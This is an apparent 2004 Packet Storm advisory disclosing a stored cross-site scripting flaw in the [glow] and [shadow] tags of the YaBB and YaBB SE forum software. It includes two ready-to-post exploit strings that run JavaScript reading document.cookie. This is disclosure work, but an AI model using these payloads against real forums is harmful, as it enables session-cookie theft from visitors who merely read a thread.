YaBBXSS.txt

2004-03-15T00:00:00
ID PACKETSTORM:32861
Type packetstorm
Reporter Cheng Peng Su
Modified 2004-03-15T00:00:00

Description

                                        
                                            `  
  
  
#####################################################################  
  
Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability  
Release Date : Mar 14,2004   
Application : YaBB/YaBBse  
Test On : YaBB 1 Gold(SP1.3)  
YaBB SE 1.5.1 Final  
Vendor URL : http://www.yabbforum.com/  
http://www.yabbse.org/  
Discover : Cheng Peng Su(apple_soup_at_msn.com)  
  
#####################################################################  
  
Proof of conecpt:  
The problem is in [glow] and [shadow] tag,yabb doesn't filter  
the charactor in this tag,attack needn't visitor to click any   
links,just when the vistor read the thread,XSS code will be   
executed.  
  
Exploit:  
[glow=red);background:url(javascript:alert(document.cookie));filte  
r:glow(color=red,2,300]Big Exploit[/glow]  
[shadow=red);background:url(javascript:alert(document.cookie));fil  
ter:shadow(color=red,left,300]Big Exploit[/shadow]  
  
Contact:  
Cheng Peng Su  
Class 1,Senior 2,High school attached to Wuhan University  
Wuhan,Hubei,China(430072)  
apple_soup_at_msn.com  
  
  
  
  
`